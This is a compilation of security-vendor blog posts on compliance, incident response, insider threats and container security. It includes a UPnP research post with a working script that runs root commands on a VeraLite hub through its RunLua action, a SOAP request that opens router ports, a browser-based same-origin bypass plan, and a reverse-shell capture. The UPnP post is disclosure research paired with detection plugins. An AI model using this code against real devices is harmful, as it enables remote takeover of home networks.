
The Buck Stops There: NIST SP 800-171


The U.S. government is ultimately responsible for preventing unauthorized access and disclosure of its non-public information. However, it will soon require its service providers to put adequate safeguards in place as well. 

Unauthorized access and disclosure of government information has become all too common in these times of frequent cyberattacks. As a result, the government is extending mandatory safeguards to nonfederal organizations that process, store or transmit Controlled Unclassified Information (CUI) or Covered Defense Information. These nonfederal organizations include contractors, subcontractors and service providers. Additionally, CUI is often provided to, or shared with, state and local governments, colleges and universities, and independent research organizations.

NIST SP 800-171: Protecting Controlled Unclassified Information in Nonfederal Information Systems and Organizations provides federal agencies with recommended requirements for protecting the confidentiality of Controlled Unclassified Information (CUI) and DoD Covered Defense Information when it is processed, stored or transmitted by nonfederal organizations.

If you are familiar with NIST SP 800-53: Security and Privacy Controls for Federal Information Systems and Organizations, SP 800-171 will look familiar. It is essentially a tailored subset of SP 800-53 controls designed to protect the confidentiality of CUI when the confidentiality impact value of the CUI is moderate or higher.

Challenges of safeguarding CUI and Covered Defense Information

NIST SP 800-171 promises to promote standardization across the differing regulations and conflicting guidance that in the past often resulted in confusion and inefficiency. However, that does not mean that 800-171 compliance is without the following challenges:

Readiness Assessments: Prior to information system deployment, security assessments are required to demonstrate that safeguards comply with NIST SP 800-171 or with alternative, but equally effective, security measures. If you self-assess you must support these security assessments with comprehensive documentation to demonstrate that required controls are implemented correctly, operating as intended and producing the desired outcome. Assessing administrative controls, such as documenting security awareness training, can be done manually. However, realistically you must automate technical control assessment.

Ongoing Security Assessment: Obtaining initial authorization to operate is merely a good start. However, most networks are highly dynamic, so you cannot rely on periodic snapshots to safeguard covered information. Therefore, you must also monitor security controls on an ongoing basis to ensure their continued effectiveness. When the inevitable issues are discovered, you must communicate them internally and implement corrective action.

Control Consolidation: If your organization is one of the many with multiple compliance requirements, you are forced to dedicate an inordinate amount of resources to generating documentation for various auditors. This is especially costly if you are using multiple systems to monitor, assess and report across multiple compliance domains. Wherever possible, you need a common set of controls and “multilingual” reporting that documents control status using domain specific language.

Monitor, assess and communicate

Tenable just announced a new capability in SecurityCenter Continuous View® (SecurityCenter CV™) that enables you to measure, visualize and effectively communicate adherence to most NIST SP 800-171 technical security controls by automating their operation, monitoring and assessment to ensure they are implemented correctly, operating as intended and producing the desired outcome.

SecurityCenter CV provides fully customizable reports, dashboards and Assurance Report Cards® (ARCs) specific to NIST SP 800-171 – all out-of-the-box. You can use them as-is or quickly and easily tailor them to meet your specific security and business needs.

For example, the SecurityCenter CV Audit and Monitoring Dashboard aligns with the Audit and Accountability (section 3.3) and System and Information Integrity (section 3.14) families in NIST SP 800-171. These families are closely related, requiring the monitoring, analysis, investigation and reporting of unlawful, unauthorized or inappropriate information system activity – including inbound and outbound communications traffic – to detect attacks and indicators of potential attacks. By using this dashboard, you can better correlate audit review, assessment and reporting processes for investigating and responding to indications of inappropriate, suspicious or unusual activity. You will also be able to monitor information system security alerts and advisories and take appropriate actions in response.

NIST 800-171 Dashboard
SecurityCenter CV Dashboard for Audit and Accountability and System and Information Integrity

SecurityCenter CV offers multiple dashboards and Assurance Report Cards to help you automate SP 800-171 control monitoring, assessment and communication. Please take a minute to learn more about these new ARCs.


SecurityCenter: Leveraging Vulnerability Data Collection for Incident Response


Prioritizing threat management and vulnerability remediation may be seen as a roadblock to effective incident response (IR) preparation, but in reality the efforts assist each other quite well. Fortunately, you can use SecurityCenter Continuous View® (SecurityCenter CV™) to improve your threat mitigation and vulnerability remediation efforts while more effectively preparing for, detecting, and preventing incidents in your environment. The steps you take with SecurityCenter CV to detect and remediate vulnerabilities can enable you to effectively and efficiently respond to incidents.

Preparation and data collection

An important step in preparing SecurityCenter CV to assist in threat management and incident response efforts is to schedule routine credentialed scans of targeted endpoints. Credentialed scans analyze the targeted host in order to gather machine- and user-specific data. SecurityCenter CV has several built-in scan policies that are useful to gather the vulnerability data related to IR, such as the Malware Scan policy and the Credentialed Patch Audit policy. Additionally, a custom credentialed scan could be configured to be more inclusive, thereby gathering more data relevant to incident response. For an ideal threat management and incident response preparation scan, the following plugin families should be enabled:

  • Backdoors
  • Brute force attacks
  • Denial of Service
  • Gain a shell remotely
  • General
  • Incident Response
  • Misc
  • Service Detection
  • Settings
  • Local Security Checks
    • Debian, Mac OS X, Red Hat, VMware ESX, and others
  • Windows
    • Windows, Windows : Microsoft Bulletins, Windows: User Management

The OS-specific and Incident Response families will attempt to gather detailed information about user accounts and behavior, as well as vulnerabilities exposed by missing patches. Plugins are added to the local security checks and Microsoft Bulletins families in response to emerging threats. These plugins are often also tied to CVE numbers in order to improve tracking and monitoring of the threat. Additionally, plugins are added to these families when OS-specific vulnerabilities are identified in an application so that the vulnerable instances of the application can be more easily identified.

Custom or default scan policies

In addition to running credentialed scans, relevant data can be gathered by the Tenable Log Correlation Engine® (LCE®) and the Tenable Passive Vulnerability Scanner® (PVS™). The passive data gathered by PVS is automatically stored in the vulnerability database. In addition to continuously providing normalized events to the SecurityCenter CV events database, LCE converts data from normalized events into event plugins and sends them to the SecurityCenter CV vulnerability database. The event plugins can be leveraged alongside active and passive vulnerability data to prevent and detect incidents, as well as manage and mitigate risk from vulnerabilities.

Analysis

All of the data gathered by the sensors included in SecurityCenter CV can be effectively and efficiently interpreted through the use of dashboards and reports. The Incident Response Support dashboard and report present detailed information about areas of concern, such as detected services, host compromise, and suspicious activity.

Incident Response Support dashboard

When the alerts are triggered and the alarms go off, panic often ensues. When the alerts and alarms are triggered by a network incident, analysts can have difficulty determining where to start remediation efforts. The data gathered by SecurityCenter CV can be invaluable after an incident in order to determine the source, cause, and scope:

  • If the source IP address is known, filtering vulnerability data for that address can provide detailed information about the potential exploitation opportunities, user accounts accessing that host, and connections between that host and others.
  • If the incident was the result of an exploited vulnerability, a search for that vulnerability will provide a list of similarly exploitable hosts.
  • Additional details about host activity are available from active plugins tracking host information, running processes, and user activity.
  • Identifying running and malicious processes can be useful when dealing with anything from user activity to malware infections.
  • The data gathered about Autoruns, prefetch files, and startup applications on Windows can help to identify, track, and contain malicious activity.
  • Leveraging the known data about an incident to identify the full impact is an especially effective way to contain the issue at hand and prevent recurrence.
  • Preconfigured content from the SecurityCenter Feed, such as dashboards and reports, can be useful in visualizing information related to an incident.
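The first two bullets above can be sketched as simple filters over exported findings. This is a toy illustration; the record fields ("ip", "cves", "plugin") are hypothetical and not an actual SecurityCenter export format:

```python
# Toy IR triage filters over exported vulnerability findings.
# The field names below are illustrative, not a real export schema.

def findings_for_host(findings, ip):
    """All findings observed on a suspect host (the incident source)."""
    return [f for f in findings if f["ip"] == ip]

def hosts_with_cve(findings, cve):
    """Hosts exposed to the same CVE that was exploited in an incident."""
    return sorted({f["ip"] for f in findings if cve in f.get("cves", ())})

findings = [
    {"ip": "10.0.0.5", "plugin": "OpenSSL Heartbeat", "cves": ["CVE-2014-0160"]},
    {"ip": "10.0.0.9", "plugin": "OpenSSL Heartbeat", "cves": ["CVE-2014-0160"]},
    {"ip": "10.0.0.5", "plugin": "SSH Service Detection", "cves": []},
]

# Every host similarly exposed to the exploited vulnerability:
print(hosts_with_cve(findings, "CVE-2014-0160"))
```

In practice the same pivots are done with filters in the SecurityCenter UI rather than by hand, but the logic is the same: pivot by source address, then by exploited vulnerability.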

Preconfigured dashboards and reports can be added from the SecurityCenter Feed to support threat management and incident response efforts:

  • From the Dashboard tab, click the Options menu on the right then choose Add Dashboard to search the Feed for relevant dashboards.
  • From the Reports tab under the Reporting menu, click the Add button to bring up and search the Feed.
  • When content is added from the SecurityCenter Feed, the Targets filter in the Focus section can be set so that specific targets will be added automatically as filters. Setting this filter will enable your security team to more efficiently gather information about specific targets when responding to incidents on the network.
  • For custom content, filters related to plugin families or names can help focus results on areas of concern, while filtering for assets or IP address ranges can focus the content on specific parts of the network.
Targets Filter from Feed

Next steps

Now that you know more about how to leverage SecurityCenter Continuous View in your threat management and incident response preparation initiatives, you can start applying the knowledge to your own environment. Configure credentialed scans to run regularly, gather data from as many hosts as possible, and investigate incidents when they occur. All of those steps will enable you to take advantage of the integrated capabilities of SecurityCenter CV in order to improve your threat management, vulnerability remediation, and incident response efforts.

Forbes Names Tenable as One of the Next Billion-Dollar Startups for 2016


This week, Forbes released its second annual list of billion-dollar startups. Tenable is proud to be included in this prestigious list of 25 up and coming companies for 2016.

2016 seems to be the year that organizations have realized there’s no silver-bullet startup that can combat the vast complexities of today’s cybersecurity landscape. With steady growth and innovation over the past 14 years, Tenable has always been positioned to help our customers combat increasing threats and has extended our platform to some of the largest enterprises around the globe.

Read more about why Forbes chose Tenable as a next billion-dollar startup.


Do You Know Where Your UPnP Is?


Much has been said about the security of Universal Plug and Play (UPnP) over the years. There have been FBI warnings, security researchers have published papers, and even Forbes has told us to disable UPnP. But how do you know if UPnP servers are on your network? Are there specific services we should worry about? Do we really need to be concerned about UPnP?

Finding UPnP services

To answer some of these questions, Tenable wrote a simple Python script called upnp_info.py. You can find it on our GitHub. The script finds all UPnP services and enumerates their functionality. Check out the README for full details.
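Under the hood, discovery like this starts with an SSDP M-SEARCH request to the UPnP multicast group, then collects the LOCATION headers from any responses. Here is a minimal sketch of that first step (the timeout is an arbitrary choice, and upnp_info.py itself may differ in details):

```python
# Minimal SSDP discovery sketch: multicast an M-SEARCH and collect
# the LOCATION header from each responding UPnP server.
import socket

SSDP_ADDR, SSDP_PORT = "239.255.255.250", 1900

def build_msearch(st="upnp:rootdevice", mx=2):
    """Build the SSDP M-SEARCH discovery request."""
    return ("M-SEARCH * HTTP/1.1\r\n"
            "HOST: {}:{}\r\n"
            "MAN: \"ssdp:discover\"\r\n"
            "MX: {}\r\n"
            "ST: {}\r\n\r\n").format(SSDP_ADDR, SSDP_PORT, mx, st).encode()

def parse_location(response):
    """Pull the LOCATION header out of an SSDP response, if present."""
    for line in response.decode(errors="replace").splitlines():
        if line.lower().startswith("location:"):
            return line.split(":", 1)[1].strip()
    return None

def discover(timeout=3):
    """Multicast an M-SEARCH and gather unique LOCATION URLs."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_msearch(), (SSDP_ADDR, SSDP_PORT))
    locations = set()
    try:
        while True:
            data, _ = sock.recvfrom(4096)
            loc = parse_location(data)
            if loc:
                locations.add(loc)
    except socket.timeout:
        pass
    return locations

if __name__ == "__main__":
    for loc in discover():
        print("-> " + loc)
```

Each returned LOCATION is a URL to an XML device description, which is where the real enumeration begins.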

Some of you may be thinking, “I don’t need that script. I know I disabled UPnP.” But did you? Consider this screenshot of my home router’s web interface:

Router web interface

Looks like I disabled UPnP, right? Here’s what upnp_info.py says about my network:

[+] Discovering UPnP locations
[+] Discovery complete
[+] 2 locations found:
	-> http://192.168.1.1:1990/WFADevice.xml
	-> http://192.168.1.1:1901/root.xml

Looks like there are still a couple of UPnP services available on my router even after apparently disabling that functionality. What does the UPnP Enabled checkbox on the router’s UI do? I enabled it to find out what the difference is:

[+] Discovering UPnP locations
[+] Discovery complete
[+] 3 locations found:
	-> http://192.168.1.1:39468/rootDesc.xml
	-> http://192.168.1.1:1990/WFADevice.xml
	-> http://192.168.1.1:1901/root.xml

Another UPnP service! But what are all these for? upnp_info.py provides a long description of each UPnP location it encounters. Since this output is verbose, here’s a look at just the services provided by the new UPnP server on port 39468:

[+] Loading http://192.168.1.1:39468/rootDesc.xml...
	-> Server String: Linux/BHR4 UPnP/1.1 MiniUPnPd/1.8
	==== XML Attributes ===
	-> Device Type: urn:schemas-upnp-org:device:InternetGatewayDevice:1
	-> Friendly Name: Verizon FiOS-G1100
	-> Manufacturer: Linux
	-> Manufacturer URL: http://www.verizon.com/
	-> Model Description: Linux router
	-> Model Name: Linux router
	-> Model Number: FiOS-G1100
	-> Services:
		=> Service Type: urn:schemas-upnp-org:service:WANIPConnection:1
		=> Control: /ctl/IPConn
		=> Events: /evt/IPConn
		=> API: http://192.168.1.1:45973/WANIPCn.xml
			- SetConnectionType
			- GetConnectionTypeInfo
			- RequestConnection
			- ForceTermination
			- GetStatusInfo
			- GetNATRSIPStatus
			- GetGenericPortMappingEntry
			- GetSpecificPortMappingEntry
			- AddPortMapping
			- DeletePortMapping
			- GetExternalIPAddress

You can generally figure out what type of service a UPnP server offers by looking at the “Device Type” attribute. Above, you can see that the device type is urn:schemas-upnp-org:device:InternetGatewayDevice:1. This UPnP server implements the infamous Internet Gateway Device (IGD) Protocol.
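Extracting those attributes is straightforward: each location serves an XML device description in the standard UPnP device-description namespace. A short sketch, using a sample abbreviated from the output above:

```python
# Sketch of parsing a UPnP device description (e.g., rootDesc.xml)
# to extract the device type and friendly name.
import xml.etree.ElementTree as ET

NS = "{urn:schemas-upnp-org:device-1-0}"  # standard UPnP description namespace

def parse_device_description(xml_text):
    """Return the deviceType and friendlyName from a device description."""
    device = ET.fromstring(xml_text).find(NS + "device")
    return {
        "deviceType": device.findtext(NS + "deviceType"),
        "friendlyName": device.findtext(NS + "friendlyName"),
    }

SAMPLE = """<root xmlns="urn:schemas-upnp-org:device-1-0">
  <device>
    <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
    <friendlyName>Verizon FiOS-G1100</friendlyName>
  </device>
</root>"""
```

A full enumerator would also walk the `serviceList` under `device` to find each service's control URL and SCPD (API) document, which is how upnp_info.py lists actions.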

IGD allows anyone on the LAN to open holes in the router’s firewall. Everyone should disable IGD since it is easily abused by both insider threats and malware. And don’t think IGD is only a liability on the LAN. A tool called Filet O Firewall has proven that a motivated remote attacker can reach it from the WAN too. Nessus® users can use plugin 35707 to check for IGD manipulation.
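For illustration, this is roughly the SOAP request a LAN client sends to the WANIPConnection control URL (/ctl/IPConn above) to punch a hole in the firewall via AddPortMapping. The ports, client address, and description below are made up; delivering the request is just an HTTP POST:

```python
# Sketch of an IGD AddPortMapping SOAP request. The mapping values are
# illustrative; posting the body to the control URL creates the mapping.

SOAP_TEMPLATE = (
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
    's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    '<s:Body>'
    '<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
    '<NewRemoteHost></NewRemoteHost>'
    '<NewExternalPort>{external}</NewExternalPort>'
    '<NewProtocol>TCP</NewProtocol>'
    '<NewInternalPort>{internal}</NewInternalPort>'
    '<NewInternalClient>{client}</NewInternalClient>'
    '<NewEnabled>1</NewEnabled>'
    '<NewPortMappingDescription>{desc}</NewPortMappingDescription>'
    '<NewLeaseDuration>0</NewLeaseDuration>'
    '</u:AddPortMapping></s:Body></s:Envelope>'
)

def build_add_port_mapping(external_port, internal_port, client, desc="demo"):
    """Build the headers and SOAP body for an IGD AddPortMapping call."""
    headers = {
        "SOAPAction": '"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"',
        "Content-Type": 'text/xml; charset="utf-8"',
    }
    body = SOAP_TEMPLATE.format(external=external_port, internal=internal_port,
                                client=client, desc=desc)
    return headers, body
```

No authentication is involved anywhere in that exchange, which is exactly why IGD is so easily abused.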

However, I’m not here to talk about IGD. IGD has been written and talked about so much that it has almost become interchangeable with UPnP. Yet, UPnP has so much more to offer! It can be used to create file shares, stream media, control the volume on your television, unlock your front door, and just about anything that a developer can imagine!

Examining a different type of UPnP server

Now take a look at a different UPnP server on my home network and consider the security threats it might represent.

On my network, I have a smart home controller called VeraLite. The device implements multiple UPnP services, but I’ll focus on the HomeAutomationGateway interface.

[+] Loading http://192.168.1.251:49451/luaupnp.xml...
	-> Server String: Linux/2.6.37.1, UPnP/1.0, Portable SDK for UPnP devices/1.6.6
	==== XML Attributes ===
	-> Device Type: urn:schemas-micasaverde-com:device:HomeAutomationGateway:1
	-> Friendly Name: MiOS 35035299
	-> Manufacturer: MiOS, Ltd.
	-> Manufacturer URL: http://www.mios.com
	-> Model Description: MiOS Z-Wave home gateway
	-> Model Name: MiOS
	-> Model Number: 1.0
	-> Services:
		=> Service Type: urn:schemas-micasaverde-org:service:HomeAutomationGateway:1
		=> Control: /upnp/control/hag
		=> Events: /upnp/event/hag
		=> API: http://192.168.1.251:49451/luvd/S_HomeAutomationGateway1.xml
			- Reload
			- GetUserData
			- ModifyUserData
			- SetVariable
			- GetVariable
			- GetStatus
			- GetActions
			- RunScene
			- SceneOff
			- SetHouseMode
			- RunLua
			- ProcessChildDevices
			- CreateDevice
			- DeleteDevice
			- CreatePlugin
			- DeletePlugin
			- CreatePluginDevice
			- ImportUpnpDevice
			- LogIpRequest

As you can see from the device type, this interface is not one of the standard profiles defined by the Open Interconnect Consortium (formerly the UPnP Forum). The standard profiles start with urn:schemas-upnp-org, but this HomeAutomationGateway profile starts with urn:schemas-micasaverde-com. This is a custom schema defined by MiCasaVerde (the maker of VeraLite).

What does this mean? It simply means that this UPnP interface is not burdened by a specification released by a governing body. The server’s developers, MiCasaVerde, can implement any actions they’d like. So, I need to look at the API closely to determine if any of the available actions present a security risk. For example, is the Reload action a denial of service vector?

Background research into the VeraLite revealed that, in 2013, Daniel Crowley (@dan_crowley), Jennifer Savage (@savagejen), and David Bryan (@_videoman_) wrote and presented a paper called Home Invasion 2.0. The paper includes details about using VeraLite’s HomeAutomationGateway RunLua action to gain root access on the device (TWSL2013-019 - CVE-2013-4863)! This is exactly the type of thing you should be worried about. Looking back at the upnp_info.py output, the RunLua action is available for our use.

Testing the RunLua action

Given Daniel’s previous success in executing Lua code via RunLua, I figured I’d give it a try too. I assumed I’d have little chance of success since this vulnerability was reported 3 years ago and my VeraLite was running the latest firmware (1.7.855, released in August 2016). However, given MiCasaVerde’s response to SpiderLabs’ disclosure, I decided it couldn’t hurt to try.

I created a simple script that would attempt to execute touch /tmp/hello:

import requests
import sys

if len(sys.argv) != 2:
    print 'Usage: ./run_lua.py <url>'
    sys.exit(0)

payload = ('<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" ' +
    'xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">' +
    '<s:Body>' +
    '<u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1">' +
    '<Code>os.execute(&quot;touch /tmp/hello;&quot;)</Code>' +
    '</u:RunLua>' +
    '</s:Body>' +
    '</s:Envelope>')

soapActionHeader = { 
    'soapaction' : '"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua"',
    'MIME-Version' : '1.0',
    'Content-type' : 'text/xml;charset="utf-8"'}

resp = requests.post(sys.argv[1], data=payload, headers=soapActionHeader)
print resp.text

I was pretty surprised when I saw this response:

$ python run_lua.py http://192.168.1.251:49451/upnp/control/hag
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:RunLuaResponse xmlns:u="Unknown Service"><OK>OK</OK></u:RunLuaResponse></s:Body></s:Envelope>

It worked! I even SSH’ed in and verified that the new file existed in /tmp/. That means anybody on my LAN can get root access to my VeraLite! The device that is supposed to control all the other smart devices in my home is rootable via a single UPnP action!

That’s bad but this is restricted to my LAN, right? I guess I trust the people on my LAN. And I’d certainly never be so foolish as to expose this thing to the Internet.

Getting a reverse shell from the WAN

That got me thinking though… what would it take for a remote attacker to trigger the RunLua action? Assuming an attacker could direct a user from my LAN to a website, how could this be exploitable? There are a couple of obstacles an attacker would have to overcome:

  • The attacker would need to figure out the VeraLite’s IP address
  • The attacker would need to bypass the browser’s same-origin policy

Figuring out the VeraLite’s IP address wouldn’t be too hard. An attacker can get the victim’s private IP address using the WebRTC IP leak. Simply knowing the victim’s private IP doesn’t reveal the VeraLite’s address, but it could help an attacker guess the address.
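As a sketch of that guessing step: once the victim's private address leaks, the attacker's search space is (typically) the surrounding /24, and every other host on it is a candidate to probe. The /24 assumption is mine; home networks vary:

```python
# Given a leaked private IP, enumerate the other addresses an attacker
# would probe for the VeraLite. Assumes a typical /24 home network.
import ipaddress

def candidate_hosts(victim_ip, prefix=24):
    """All other host addresses on the victim's subnet."""
    net = ipaddress.ip_network("{}/{}".format(victim_ip, prefix), strict=False)
    return [str(h) for h in net.hosts() if str(h) != victim_ip]
```

At 253 candidates, brute-forcing from the victim's browser is entirely practical.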

Bypassing the browser’s same-origin policy in order to communicate from the victim’s browser to the VeraLite isn’t easy though… But wait! VeraLite is using Portable SDK for UPnP Devices (libupnp) version 1.6.6. Besides being vulnerable to a handful of stack overflows, 1.6.6 is also vulnerable to CVE-2016-6255! CVE-2016-6255 allows an attacker to create an arbitrary file in the server’s web root. I can create a webpage on the VeraLite and then load it in an iframe. That would get around the same-origin policy!

Proof of concept

In order to flesh this out, I wrote a proof of concept. You can find the code on my GitHub. When runlua.html is loaded into a victim’s browser and VeraLite is present on the victim’s LAN, the result is a reverse shell for the attacker. It looks like this:

albino-lobster@ubuntu:~$ nc -l 1270
/bin/sh: can't access tty; job control turned off

BusyBox v1.17.3 (2012-01-09 12:40:42 PST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ #

What’s truly interesting about this attack is that it doesn’t just apply to the VeraLite. A remote attacker can invoke any action on any UPnP server that uses libupnp before the fix for CVE-2016-6255 by using this same-origin bypass.

Tenable solutions

Tenable recently released a Nessus plugin that exercises the VeraLite UPnP RunLua vulnerability. The plugin ID is 93911.

VeraScan Plugin

Furthermore, Tenable has recently revamped the Nessus UPnP plugins to improve discovery and provide further insight into UPnP server functionality. For example, in the VeraLite scan above, there is a plugin named UPnP API Listing (94047) that displays the UPnP actions that the server supports.

UPnP API Listing Plugin

Other new plugins include UPnP File Share Detection (94046) and IGD Port Mapping Listing (94048).

Conclusion

Understanding the attack surface of your network is of utmost importance. UPnP can make that challenging because services are not always easy to find or understand. The tools we’ve provided should help you take the first step in discovering and locking down your UPnP services.

Mr. Robot and Your Crown Jewels


Through Season 2 of Mr. Robot, we saw the aftermath of the 5/9 hacks and gained more of an understanding of what roles each character plays in the attack. While last season focused on gaining initial entry to E Corp, this season showed what happens after the initial breach. Many security professionals spend huge amounts of time, effort, and money on trying to prevent malicious actors from breaching the perimeter, but neglect what can happen once inside.

The crown jewels

In penetration testing, the goal for any attack simulation should be to identify and attack the organization’s “crown jewels” – the thing that would cause them the most harm if compromised, stolen, or made unavailable. These can be things like patient records for medical facilities, stored credit card numbers for merchants, or intellectual property for software companies. Unfortunately, many penetration testers still end their assessments after gaining domain administrator permissions and completely neglect demonstrating impact to their clients, leaving them to wonder what the point of the assessment was and where to go next.

Mr. Robot Season 2 Spoiler Alert!

F Society and the Dark Army decided to target the uninterruptible power supplies (UPSs) in E Corp’s paper backup facility as their crown jewel. This makes sense because the original goal was to completely wipe out E Corp’s records of customer debt. Season 1 showed F Society wiping the digital records, but the paper backups were still being shipped to a separate facility. By getting their malware into the UPS firmware and causing the battery regulators to stop working, F Society can destroy the last remaining records of the debt by causing a massive fire in the backup facility.

Now I don’t recommend terrorism as a method for demonstrating impact to an organization, but these are the “what ifs” we should be identifying and simulating as red teamers and trying to defend against on the blue team. Domain admin credentials are a very useful tool, but shouldn’t be the stopping point (unless that was all the scope allowed). Going beyond them provides much more value to the organization by identifying risks with tangible impacts and gives the organization an idea of where to invest its security budget to help protect the crown jewels.

Insider threats

The other risk is the insider. Many times throughout this season, F Society relied on Angela, who is now an employee at E Corp, to do something for them that would be very risky or impossible for them to do themselves. Angela had legitimate access to the E Corp office and a computer on the domain. F Society used Angela to plant the femtocell on the controlled floor to compromise the FBI agent phones, as well as having her plug the USB Rubber Ducky into Mr. Green’s workstation to steal his credentials. Insiders can be blackmailed, coerced, or act on their own motivation. Regardless of the driver towards maliciousness, they pose a serious threat because insiders often know what your crown jewels are, where they are, and how to get to them. This pre-existing knowledge combined with legitimate access can be a perfect storm for a breach.

As Mr. Robot shows us, all it takes is a single employee to open the door for attackers. Rules only apply to those willing to follow them; attackers always ignore the rules. No amount of policy and paperwork can stop someone who is determined to harm an organization. You need a plan for identifying weaknesses and for validating that your security policies are properly implemented. You also need to wargame that plan to make sure that the plan is implemented and functioning properly on a continual basis. Always assume that you will be breached at some point, and that you must be ready to identify, contain, and eradicate a compromise in short order.

Protective action

To protect your organization from insider threats, focus on these issues:

  • Track, correlate, and alert on insider movement via network logs; establish a baseline of normal behavior, and then alert on divergences
  • Monitor and follow up on any exfiltration of data, regardless of whether or not the actor is a “trusted source”
  • Train your employees to recognize and report social engineering (attempts to manipulate an employee into sharing confidential information)
  • Educate employees to avoid falling prey to phishing emails (messages supposedly authored by a trusted insider and making a questionable request, such as sending confidential financial data to an executive)
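The first bullet above, baseline normal behavior and then alert on divergences, can be sketched in a few lines. This is a toy model (daily login counts, a 3-sigma threshold, both my assumptions), not a substitute for real behavioral analytics:

```python
# Toy insider-threat baseline: flag users whose daily activity diverges
# from their historical norm by more than `threshold` standard deviations.
from statistics import mean, stdev

def flag_divergences(baseline, today, threshold=3.0):
    """Return users whose activity today diverges from their baseline."""
    flagged = []
    for user, history in baseline.items():
        mu, sigma = mean(history), stdev(history)
        observed = today.get(user, 0)
        if sigma and abs(observed - mu) / sigma > threshold:
            flagged.append(user)
    return flagged

# Five days of per-user daily login counts, then today's observation.
baseline = {"alice": [10, 12, 11, 9, 10], "bob": [3, 4, 2, 3, 3]}
today = {"alice": 11, "bob": 40}  # bob is suddenly very active
```

A real deployment would baseline many signals (logins, data volume, destinations, working hours) from correlated network logs rather than a single count.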

A product like SecurityCenter Continuous View® provides tools such as the Insider Threat Dashboard to help differentiate the activity of trusted sources from malicious behavior.

Knowing who and what is on your network, what your crown jewels are, and having a plan to protect them not just from the outside, but also from insiders, is a great lesson we can learn from this season of Mr. Robot.

Expanding Vulnerability Management to Container Security: FlawCheck Joins Tenable


Today marked a significant milestone, as Tenable Network Security announced the acquisition of FlawCheck, a company that Sasan Padidar and I founded in early 2015. We built FlawCheck to address the difficulty of detecting security risks, at scale, in the world's largest data centers. As we engaged with some of the largest companies on their next-generation data center security challenges, we honed in on container environments as an area particularly fraught with issues.

As organizations seek to accelerate their innovation cycles to deliver better products to customers, DevOps and containerized software are becoming the norm. In fact, a recent survey found 53% of companies had either deployed or were in the process of evaluating containers.

Vulnerabilities are being inadvertently introduced into production

But with new technologies and processes come new challenges. Most notably, vulnerabilities are being inadvertently introduced into production through these nascent DevOps processes – a significant blind spot for security teams. An additional challenge is that in container environments, the role of security operations often changes, with the development team typically taking responsibility for both provisioning and vulnerability remediation.

This is the challenge we have addressed with FlawCheck and are excited to continue working on at Tenable. The product today serves as a private registry for container images, automatically scanning images for vulnerabilities and malware as they’re built, before they can reach production, and continuously monitoring them thereafter. By integrating with the continuous integration and continuous deployment (CI/CD) systems that build container images, it helps ensure production code is secure and compliant with enterprise policy.

The stakes for enterprise security are only growing, as containers deliver more of the world’s digital innovation every day.

The stakes for enterprise security are only growing, as containers deliver more of the world’s digital innovation

Bringing the FlawCheck team, technology, and product to Tenable is an exciting move. This acquisition marks many firsts. For the industry, it is the first acquisition of a container security company. For Tenable, it is the company’s first acquisition in its storied 14-year history, and its first entrance into the application security space. It's a thrilling time to be in technology and the FlawCheck team is honored to join Tenable.

The combined Tenable/FlawCheck team is now working to bring a fully integrated container security offering to market in early 2017.

In the meantime, enterprise security professionals and developers can register for a free trial of FlawCheck. As we move forward, we'll provide additional details on our product strategy and offerings. Best wishes on your container journey!

Top Oil and Gas Cybersecurity Threats Driving the Need for Vulnerability Management


We hear the headlines every day: “cyberattacks continue to grow each year in number and sophistication.” We also often hear that the costs of detecting and defending against cyberattacks continue to swell, yet pale in comparison to the costs of recovering from a cyberattack. Despite universal warnings about the dangers of cyberattacks, the response and attention to cybersecurity still differs from sector to sector.

The oil and gas industry, for example, is a sector that historically has not been cybersecurity focused. The oversupply and subsequent downturn in price per barrel has left many companies struggling to stay afloat, and cybersecurity spending continues to be a low priority in 2017 for many oil companies.

This is a potentially devastating mistake. A recent study by Boston Consulting Group found that none of the oil and gas companies surveyed have undergone a comprehensive audit of their value chain, which includes corporate, upstream, midstream, and downstream operations.

The scope of activities within the oil and gas industry’s value chain creates many potential points of entry for attack. It also leaves the industry prone to multiple types of attacks. These include attacks on the industry’s physical infrastructure (such as cutting fiber-optic cables), the disabling of critical systems (through denial-of-service attacks, for instance), and the theft or corruption of information or the prevention of its dissemination.

Boston Consulting Group Study

As you can see, given today’s threat landscape, oil and gas is in a precarious position. Adding cybersecurity to this industry is an onerous challenge, but achievable if the industry as a whole makes a cultural shift toward ingraining cybersecurity into the DNA of its operations. The first step in this process is recognizing that cybersecurity is paramount to the health and safety of all personnel and the local environments where operations are conducted.

Adding Security to Health, Safety and Environment (HSE)

One of the main challenges within the oil and gas industry is the need for companies to track cybersecurity incidents as Health, Safety and Environment incidents.

Currently, oil and gas companies track incidents, or near misses, that could impact the health and safety of personnel or of the local environment. Cybersecurity incidents and near-misses should likewise be tracked and escalated as HSE events. Additionally, the implementation of this strategy within a larger Enterprise Vulnerability Management (EVM) program can further bolster the integrity of an organization.

By implementing cybersecurity in HSE and a larger EVM program, oil and gas companies can provide greater resources and attention towards the three top IT security issues facing this sector:

  • The need for more employee cybersecurity training and awareness testing
    The use of mobile technology is huge in oil and gas, particularly in upstream where constant exploration requires constant travel. This need for cyber-awareness equates to the need for organizations to instill the policies and procedures that not only protect mobile computing devices but also portable storage.
  • Insufficient cybersecurity process and technology within operations and maintenance
    Attention to cybersecurity needs to be at the core of an EVM program. The insufficient separation of enterprise networks and plant networks, of data networks between onshore and offshore facilities, and a total lack of effective vulnerability management software have the industry at a clear disadvantage.
  • No focus on cybersecurity with vendors and third-party suppliers
